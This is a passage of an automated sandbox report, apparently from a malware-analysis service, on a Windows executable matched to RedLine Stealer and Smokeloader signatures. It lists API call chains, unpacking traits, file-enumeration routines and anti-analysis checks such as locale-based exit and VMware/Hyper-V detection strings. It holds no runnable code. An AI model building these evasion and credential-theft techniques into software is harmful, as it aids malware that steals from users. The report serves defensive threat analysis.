                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02493A0F0_2_02493A0F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024C9AAF0_2_024C9AAF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024D8B640_2_024D8B64
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02495B2F0_2_02495B2F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024CC8050_2_024CC805
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0247D9AB0_2_0247D9AB
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024BFFEF0_2_024BFFEF
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024C5C000_2_024C5C00
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024AAD0F0_2_024AAD0F
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024BED3D0_2_024BED3D
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: String function: 00404610 appears 317 times
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332
                      Source: XJQkTVvJ3I.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: XJQkTVvJ3I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\LA0MCOFI.htmJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6588
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\3a5ad177-a066-44d0-8e16-7a20bf0a7aaaJump to behavior
                      Source: XJQkTVvJ3I.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: XJQkTVvJ3I.exeReversingLabs: Detection: 39%
                      Source: unknownProcess created: C:\Users\user\Desktop\XJQkTVvJ3I.exe "C:\Users\user\Desktop\XJQkTVvJ3I.exe"
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: msvcr100.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: my_library.pdbU source: XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                      Source: Binary string: my_library.pdb source: XJQkTVvJ3I.exe, XJQkTVvJ3I.exe, 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeUnpacked PE file: 0.2.XJQkTVvJ3I.exe.400000.1.unpack .text:ER;.data:W;.filidow:R;.yegih:R;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeUnpacked PE file: 0.2.XJQkTVvJ3I.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .filidow
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .yegih
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0084241D push 7D7C6160h; retf 0_2_00842422
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_024D9280 push ecx; ret 0_2_024D9293
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0246B59C push ecx; ret 0_2_0246B5AF
                      Source: XJQkTVvJ3I.exeStatic PE information: section name: .text entropy: 7.617064064595542
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-44682
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeEvaded block: after key decisiongraph_0-45842
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeAPI coverage: 6.7 %
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,LCMapStringW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_02464357
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245F087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0245F087
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245C0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0245C0A7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245E177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245E177
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245E797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0245E797
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0245FA17
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_02464A27
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02451977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02451977
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02463D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_02463D67
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_02464DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_02464DC7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_0245DDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0245DDE7
                      Source: C:\Users\user\Desktop\XJQkTVvJ3I.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWu
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareC
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: XJQkTVvJ3I.exe, 00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
